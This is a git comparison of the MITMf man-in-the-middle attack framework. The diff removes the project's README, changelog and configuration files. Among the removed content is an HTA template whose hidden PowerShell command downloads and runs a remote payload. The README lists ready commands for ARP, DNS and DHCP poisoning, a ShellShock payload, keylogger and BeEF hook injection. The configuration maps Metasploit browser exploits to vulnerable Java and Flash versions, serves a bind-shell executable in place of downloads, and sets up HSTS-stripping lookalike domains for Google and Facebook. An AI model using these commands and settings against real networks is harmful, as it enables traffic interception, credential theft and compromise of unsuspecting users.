Compare commits


No commits in common. "master" and "v0.5" have entirely different histories.

139 changed files with 2137 additions and 16862 deletions


@@ -1,8 +0,0 @@
[run]
branch = True
[report]
include = *core*, *libs*, *plugins*
exclude_lines =
    pragma: nocover
    pragma: no cover

.gitignore

@@ -1,63 +1,3 @@
*.pyc
/plugins/old_plugins/
backdoored/
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# OSX Stuff
.DS_Store
._.DS_Store

.gitmodules

@@ -1,3 +1,3 @@
[submodule "libs/bdfactory"]
path = libs/bdfactory
[submodule "bdfactory"]
path = bdfactory
url = https://github.com/secretsquirrel/the-backdoor-factory


@@ -1,27 +0,0 @@
language: python
python:
  - "2.7"
addons:
  apt:
    packages:
      - libpcap0.8-dev
      - libnetfilter-queue-dev
      - libssl-dev
notifications:
  irc:
    channels:
      - "irc.freenode.org#MITMf"
    template:
      - "%{repository}#%{build_number} (%{branch} - %{commit} - %{commit_subject} : %{author}): %{message}"
    skip_join: true
    use_notice: true
install: "pip install -r requirements.txt"
before_script:
  - "pip install python-coveralls"
script:
  - "nosetests --with-cov"
after_success:
  - coveralls


@@ -1,47 +0,0 @@
- Added active filtering/injection into the framework
- Fixed a bug in the DHCP poisoner which prevented it from working on Windows OSes
- Made some performance improvements to the ARP spoofing poisoner
- Refactored the AppCachePoison and BrowserSniper plugins
- Refactored the proxy plugin API
- Inject plugin now uses BeautifulSoup4 to parse and inject HTML/JS
- Added the HTA Drive-By plugin
- Added the SMBTrap plugin
- Config file now updates on the fly!
- SessionHijacker has been replaced with Ferret-NG, which captures cookies and starts a proxy that will feed them to connected clients
- JavaPwn plugin has been replaced with BrowserSniper, which now supports Java, Flash and browser exploits
- Addition of the Screenshotter plugin, able to render screenshots of a client's browser at regular intervals
- Addition of a fully functional SMB server using the [Impacket](https://github.com/CoreSecurity/impacket) library
- Addition of [DNSChef](https://github.com/iphelix/dnschef); the framework is now an IPv4/IPv6 (TCP & UDP) DNS server! Supported queries are: 'A', 'AAAA', 'MX', 'PTR', 'NS', 'CNAME', 'TXT', 'SOA', 'NAPTR', 'SRV', 'DNSKEY' and 'RRSIG'
- Integrated [Net-Creds](https://github.com/DanMcInerney/net-creds); currently supported protocols are: FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos
- Integrated [Responder](https://github.com/SpiderLabs/Responder) to poison LLMNR, NBT-NS and MDNS and act as a rogue WPAD server
- Integrated [SSLstrip+](https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014
- Spoof plugin can now exploit the 'ShellShock' bug when DHCP spoofing
- Spoof plugin now supports ICMP, ARP and DHCP spoofing
- Usage of third party tools has been completely removed (e.g. Ettercap)
- FilePwn plugin re-written to backdoor executables, zip and tar files on the fly by using [the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) and code from [BDFProxy](https://github.com/secretsquirrel/BDFProxy)
- Added [msfrpc.py](https://github.com/byt3bl33d3r/msfrpc/blob/master/python-msfrpc/msfrpc.py) for interfacing with Metasploit's RPC server
- Added [beefapi.py](https://github.com/byt3bl33d3r/beefapi) for interfacing with BeEF's RESTfulAPI
- Addition of the app-cache poisoning attack by [Krzysztof Kotowicz](https://github.com/koto/sslstrip) (blogpost explaining the attack here: http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html)


@@ -1,52 +0,0 @@
Contributing
============
Hi! Thanks for taking the time to contribute to MITMf! Pull requests are always welcome!
Submitting Issues/Bug Reporting
=============
Bug reporting is an essential part of any project since it lets people know what's broken!
Before reading on, here's a list of cases where you **shouldn't** be reporting the bug:
- If you haven't installed MITMf using the method described in the [installation](https://github.com/byt3bl33d3r/MITMf/wiki/Installation) instructions (your fault!)
- If you're using an old version of the framework (and by old I mean anything that **isn't** the current version on GitHub)
- If you found a bug in a packaged version of MITMf (e.g. the Kali repos), please file a bug report with the distro's maintainer
Lately, there has been a sharp **increase** in the volume of bug reports, so in order for me to make sense of them and to quickly identify, reproduce and push a fix, I expect a minimal amount of cooperation from the reporter!
Writing the report
==================
**Before submitting a bug, familiarize yourself with [GitHub markdown](https://help.github.com/articles/github-flavored-markdown/) and use it in your report!**
After that, open an issue ticket and please describe the bug in **detail!** MITMf has a lot of moving parts so the more detail the better!
Include in the report:
- The full command string you used
- The full output of: ```pip freeze```
- The full output of MITMf in debug mode (append ```--log debug``` to the command you used)
- The OS you're using (distribution and architecture)
- The full error traceback (If any)
- If the bug resides in the way MITMf sends/receives packets, include a link to a pcap containing a full packet capture
Some good & bad examples
=========================
- How to write a bug report
https://github.com/byt3bl33d3r/MITMf/issues/71
https://github.com/byt3bl33d3r/MITMf/issues/70
https://github.com/byt3bl33d3r/MITMf/issues/64
- How not to write a bug report
https://github.com/byt3bl33d3r/MITMf/issues/35 <-- My personal favorite
https://github.com/byt3bl33d3r/MITMf/issues/139
https://github.com/byt3bl33d3r/MITMf/issues/138
https://github.com/byt3bl33d3r/MITMf/issues/128
https://github.com/byt3bl33d3r/MITMf/issues/52


@@ -1,22 +0,0 @@
# Intentional contributors (in no particular order)
- @rthijssen
- @ivangr0zni (Twitter)
- @xtr4nge
- @DrDinosaur
- @secretsquirrel
- @binkybear
- @0x27
- @golind
- @mmetince
- @niallmerrigan
- @auraltension
- @HAMIDx9
# Unintentional contributors and/or projects that I stole code from
- Metasploit Framework's os.js and Javascript Keylogger module
- Responder by Laurent Gaffie
- The Backdoor Factory and BDFProxy
- ARPWatch module from the Subterfuge Framework
- Impacket's KarmaSMB script

README.md (Executable file → Normal file)

@@ -1,171 +1,43 @@
![Supported Python versions](https://img.shields.io/badge/python-2.7-blue.svg)
![Latest Version](https://img.shields.io/badge/mitmf-0.9.8%20--%20The%20Dark%20Side-red.svg)
![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg)
[![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf)
[![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf)
[![Coverage Status](https://coveralls.io/repos/byt3bl33d3r/MITMf/badge.svg?branch=master&service=github)](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master)
# MITMf
MITMf
=====
Framework for Man-In-The-Middle attacks
**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.**
Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it
Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io
This tool is completely based on sergio-proxy https://code.google.com/p/sergio-proxy/ and is an attempt to revive and update the project.
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
Available plugins:
- Spoof - Redirect traffic using ARP spoofing, DNS spoofing or ICMP redirects
- AppCachePoison - Perform app cache poisoning attacks
- BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
- CacheKill - Kills page caching by modifying headers
- FilePwn - Backdoor executables being sent over HTTP using bdfactory
- Inject - Inject arbitrary content into HTML content
- JavaPwn - Performs drive-by attacks on clients with out-of-date Java browser plugins
- jskeylogger - Injects a JavaScript keylogger into clients' webpages
- Replace - Replace arbitrary content in HTML content
- SMBAuth - Evoke SMB challenge-response authentication attempts
- Upsidedownternet - Flips images 180 degrees
Contact me at:
- Twitter: @byt3bl33d3r
- IRC on Freenode: #MITMf
- Email: byt3bl33d3r@protonmail.com
So far the most significant changes have been:
**Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki.**
- Spoof plugin is live!! Supports ICMP, ARP and DNS spoofing
(DNS Spoofing code was stolen from https://github.com/DanMcInerney/dnsspoof/)
Installation
============
- Usage of third party tools has been completely removed (e.g. ettercap)
Please refer to the wiki for [installation instructions](https://github.com/byt3bl33d3r/MITMf/wiki/Installation)
- Addition of the BrowserProfiler plugin
Description
============
MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving
existing attacks and techniques.
- Addition of the JsKeylogger plugin
Originally built to address the significant shortcomings of other tools (e.g. Ettercap, Mallory), it's been almost completely
re-written from scratch to provide a modular and easily extensible framework that anyone can use to implement their own MITM attack.
- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory
https://github.com/secretsquirrel/the-backdoor-factory and code from BDFProxy https://github.com/secretsquirrel/BDFProxy
Features
========
- Added msfrpc.py for interfacing with Metasploit's RPC server
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins; it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
- Added Replace plugin
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better),
allowing users to modify any type of traffic or protocol.
- The configuration file can be edited on-the-fly while MITMf is running; the changes are passed down through the framework, allowing you to tweak the settings of plugins and servers while performing an attack.
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using [Net-Creds](https://github.com/DanMcInerney/net-creds), which is run on startup.
- [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
Active packet filtering/modification
====================================
You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)
For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:
```python
if packet.haslayer(ICMP):
    log.info('Got an ICMP packet!')
    packet.dst = '192.168.1.0'
```
- Use the ```packet``` variable to access the packet in a Scapy compatible format
- Use the ```data``` variable to access the raw packet data
Now to use the filter all we need to do is: ```python mitmf.py -F ~/filter.py```
You will probably want to combine that with the **Spoof** plugin to actually intercept packets from someone else ;)
**Note**: you can modify filters on-the-fly without restarting MITMf!
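For illustration, here is a slightly fuller filter sketch (hypothetical, not shipped with the framework); it assumes, as described above, that MITMf exposes the ```packet```, ```data``` and ```log``` names to the filter and that Scapy's layer classes (DNS, TCP, Raw, etc.) are available in that namespace:
```python
# filter.py - hypothetical example, adjust to your own needs
# `packet`, `data` and `log` are assumed to be provided by MITMf as described above

# Log every DNS question seen on the wire
if packet.haslayer(DNS) and packet[DNS].qr == 0:
    log.info('DNS query for {}'.format(packet[DNSQR].qname))

# Log plain-text HTTP GET requests by inspecting the raw payload
if packet.haslayer(TCP) and packet.haslayer(Raw) and 'GET /' in data:
    log.info('Intercepted an HTTP GET request')
```
As with the ICMP example above, save the file anywhere on disk and pass it with ```-F```.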
Examples
========
The most basic usage starts the HTTP proxy, the SMB, DNS and HTTP servers, and Net-Creds on interface enp3s0:
```python mitmf.py -i enp3s0```
ARP poison the whole subnet with the gateway at 192.168.1.1 using the **Spoof** plugin:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1```
Same as above + a WPAD rogue proxy server using the **Responder** plugin:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad```
ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1```
Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
Enable LLMNR/NBTNS/MDNS spoofing:
```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
```python mitmf.py -i enp3s0 --spoof --dhcp```
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
Inject an HTML IFrame using the **Inject** plugin:
```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
Inject a JS script:
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
Start a captive portal that redirects everything to http://SERVER/PATH:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH```
Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive```
Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns```
Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR```
Same as above but with hostname:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns```
And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run ```python mitmf.py --help```
# Currently available plugins
- **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application
- **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients
- **ScreenShotter** : Uses HTML5 Canvas to render an accurate screenshot of a client's browser
- **Responder** : LLMNR, NBT-NS, WPAD and MDNS poisoner
- **SSLstrip+** : Partially bypass HSTS
- **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type
- **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks
- **Ferret-NG** : Transparently hijacks client sessions
- **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients
- **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- **Inject** : Inject arbitrary content into HTML content
- **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins
- **JSkeylogger** : Injects a Javascript keylogger into a client's webpages
- **Replace** : Replace arbitrary content in HTML content
- **SMBAuth** : Evoke SMB challenge-response authentication attempts
- **Upsidedownternet** : Flips images 180 degrees
- **Captive** : Creates a captive portal, redirecting HTTP requests using 302
# How to fund my tea & sushi reserve
BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr
- Addition of the app-cache poisoning attack by Krzysztof Kotowicz
- JavaPwn plugin now live! Auto-detects and exploits clients with out-of-date Java plugins using the Metasploit Framework's RPC interface!!

bdfactory Submodule

@@ -0,0 +1 @@
Subproject commit 35d67b82050a7e7315132185129f5e65a0893b75


@@ -1,2 +0,0 @@
;alert('AppCache Poison was here. Google Analytics FTW');


@@ -1,31 +0,0 @@
<html>
<head>
<title>Captive Portal</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>
</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>Client Required</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="CaptiveClient.exe"><b>Captive Portal Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Captive Server</b></div>
</center>
</body>
</html>


@@ -1,4 +0,0 @@
<script>
var c = "powershell.exe -w hidden -nop -ep bypass -c \"\"IEX ((new-object net.webclient).downloadstring('http://0.0.0.0:3000/ps/ps.png')); Invoke-ps\"\"";
new ActiveXObject('WScript.Shell').Run(c);
</script>


@@ -1,528 +0,0 @@
#
# MITMf configuration file
#
[MITMf]
# Required BeEF and Metasploit options
[[BeEF]]
host = 127.0.0.1
port = 3000
user = beef
pass = beef
[[Metasploit]]
rpcip = 127.0.0.1
rpcport = 55552
rpcpass = abc123
[[MITMf-API]]
host = 127.0.0.1
port = 9999
[[DNS]]
#
# Here you can configure MITMf's internal DNS server
#
tcp = Off # Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!)
port = 53 # Port to listen on
ipv6 = Off # Run in IPv6 mode (not fully tested, might break stuff!)
#
# Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
# can also be a comma-separated list, e.g. 8.8.8.8,8.8.4.4
#
nameservers = 8.8.8.8
[[[A]]] # Queries for IPv4 address records
*.thesprawl.org=192.168.178.27
*.captive.portal=192.168.1.100
[[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
[[[MX]]] # Queries for mail server records
*.thesprawl.org=mail.fake.com
[[[NS]]] # Queries for name server records
*.thesprawl.org=ns.fake.com
[[[CNAME]]] # Queries for alias records
*.thesprawl.org=www.fake.com
[[[TXT]]] # Queries for text records
*.thesprawl.org=fake message
[[[PTR]]] # PTR queries
*.2.0.192.in-addr.arpa=fake.com
[[[SOA]]] #FORMAT: mname rname t1 t2 t3 t4 t5
*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600
[[[NAPTR]]] #FORMAT: order preference flags service regexp replacement
*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .
[[[SRV]]] #FORMAT: priority weight port target
*.*.thesprawl.org=0 5 5060 sipserver.fake.com
[[[DNSKEY]]] #FORMAT: flags protocol algorithm base64(key)
*.thesprawl.org=256 3 5 AQPSKmynfzW4kyBv015MUG2DeIQ3Cbl+BBZH4b/0PY1kxkmvHjcZc8nokfzj31GajIQKY+5CptLr3buXA10hWqTkF7H6RfoRqXQeogmMHfpftf6zMv1LyBUgia7za6ZEzOJBOztyvhjL742iU/TpPSEDhm2SNKLijfUppn1UaNvv4w==
[[[RRSIG]]] #FORMAT: covered algorithm labels labels orig_ttl sig_exp sig_inc key_tag name base64(sig)
*.thesprawl.org=A 5 3 86400 20030322173103 20030220173103 2642 thesprawl.org. oJB1W6WNGv+ldvQ3WDG0MQkg5IEhjRip8WTrPYGv07h108dUKGMeDPKijVCHX3DDKdfb+v6oB9wfuh3DTJXUAfI/M0zmO/zz8bW0Rznl8O3tGNazPwQKkRN20XPXV6nwwfoXmJQbsLNrLfkGJ5D6fwFm8nN+6pBzeDQfsS3Ap3o=
#
# Plugin configuration starts here
#
[Captive]
# Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server)
Port = 8080
ServerString = "Captive Server 1.0"
# Set the filename served as /CaptivePortal.exe by integrated http server
PayloadFilename = config/captive/calc.exe
[Replace]
[[Regex1]]
'Google Search' = '44CON'
[[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
[Ferret-NG]
#
# Here you can specify the client to hijack sessions from
#
Client = '10.0.237.91'
[SSLstrip+]
#
#Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
#
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
#for facebook
www.facebook.com = social.facebook.com
[Responder]
#Servers to start
SQL = On
HTTPS = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
LDAP = On
#Custom challenge
Challenge = 1122334455667788
#Specific IP Addresses to respond to (default = All)
#Example: RespondTo = 10.20.1.100-150, 10.20.3.10
RespondTo =
#Specific NBT-NS/LLMNR names to respond to (default = All)
#Example: RespondTo = WPAD, DEV, PROD, SQLINT
RespondToName =
#Specific IP Addresses not to respond to (default = None)
#Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
DontRespondTo =
#Specific NBT-NS/LLMNR names not to respond to (default = None)
#Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName =
[[HTTP Server]]
#Set to On to always serve the custom EXE
Serve-Always = Off
#Set to On to replace any requested .exe with the custom EXE
Serve-Exe = On
#Set to On to serve the custom HTML if the URL does not contain .exe
Serve-Html = Off
#Custom HTML to serve
HtmlFilename = config/responder/AccessDenied.html
#Custom EXE File to serve
ExeFilename = config/responder/BindShell.exe
#Name of the downloaded .exe that the client will see
ExeDownloadName = ProxyClient.exe
#Custom WPAD Script
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}'
#HTML answer to inject in HTTP responses (before </body> tag).
#Set to an empty string to disable.
#In this example, we make users' browsers issue a request to our rogue SMB server.
HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>
[[HTTPS Server]]
#Configure SSL Certificates to use
SSLCert = config/responder/responder.crt
SSLKey = config/responder/responder.key
[AppCachePoison]
# HTML5 AppCache poisoning attack
# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
# generic settings for tampering engine
#enable_only_in_useragents=Chrome|Firefox
templates_path=config/app_cache_poison_templates
# when visiting first url matching following expression we will embed iframes with all tamper URLs
#(to poison the cache for all of them all at once)
mass_poison_url_match=http://.*prezydent\.pl.*
# it's only useful to mass poison chrome because:
# - it supports iframe sandbox preventing framebusting
# - does not ask for confirmation
mass_poison_useragent_match=Chrome|Safari
[[test]]
# any //example.com URL redirects to iana and will display our spoofed content
tamper_url=http://example.com/
manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
templates=test # which templates to use for spoofing content?
skip_in_mass_poison=1
[[google]]
tamper_url_match = http://www.google.com\.*.
tamper_url = http://www.google.com
manifest_url = http://www.google.com/robots.txt
[[facebook]]
tamper_url=http://www.facebook.com/?_rdr
manifest_url=http://www.facebook.com/robots.txt
templates=facebook # use different template
[[twitter]]
tamper_url=http://twitter.com/
tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[[html5rocks]]
tamper_url=http://www.html5rocks.com/en/
manifest_url=http://www.html5rocks.com/robots.txt
[[ga]]
# we can also modify non-HTML URLs to append malicious code to them
# but for them to be cached in HTML5 AppCache they need to be referred in
# manifest for a poisoned domain
# if not, they are "only" cached for 10 years :D
raw_url=http://www.google-analytics.com/ga.js
templates=script
skip_in_mass_poison=1
#you can add other scripts in additional sections like jQuery etc.
[BrowserSniper]
#
# Currently only supports java, flash and browser exploits
#
# The version strings were pulled from http://www.cvedetails.com
#
# When adding java exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
#
msfport = 8080 # Port to start Metasploit's webserver which will host the exploits
[[exploits]]
[[[multi/browser/java_rhino]]] #Exploit's MSF path
Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
OS = Any #Can be set to Any, Windows or Windows + version (e.g Windows 8.1)
Browser = Any #Can be set to Any, Chrome, Firefox, MSIE or browser + version (e.g IE 6)
Plugin = Java #Can be set to Java, Flash (if Type is BrowserVuln will be ignored)
#An exact list of the plugin versions affected (if Type is BrowserVuln will be ignored)
PluginVersions = 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.23, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.3, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0
[[[multi/browser/java_atomicreferencearray]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.5.0, 1.5.0.1, 1.5.0.10, 1.5.0.11, 1.5.0.12, 1.5.0.13, 1.5.0.14, 1.5.0.15, 1.5.0.16, 1.5.0.17, 1.5.0.18, 1.5.0.19, 1.5.0.2, 1.5.0.20, 1.5.0.21, 1.5.0.22, 1.5.0.23, 1.5.0.24, 1.5.0.25, 1.5.0.26, 1.5.0.27, 1.5.0.28, 1.5.0.29, 1.5.0.3, 1.5.0.31, 1.5.0.33, 1.5.0.4, 1.5.0.5, 1.5.0.6, 1.5.0.7, 1.5.0.8, 1.5.0.9, 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.29, 1.6.0.3, 1.6.0.30, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0, 1.7.0.1, 1.7.0.2
[[[multi/browser/java_jre17_jmxbean_2]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[multi/browser/java_jre17_reflection_types]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[multi/browser/java_verifier_field_access]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.4.2.37, 1.5.0.35, 1.6.0.32, 1.7.0.4
[[[multi/browser/java_jre17_provider_skeleton]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.21, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[exploit/windows/browser/adobe_flash_pcre]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 11.2.202.440, 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296
[[[exploit/windows/browser/adobe_flash_net_connection_confusion]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 16.0.0.305
[[[exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144
[[[exploit/multi/browser/adobe_flash_opaque_background_uaf]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Flash
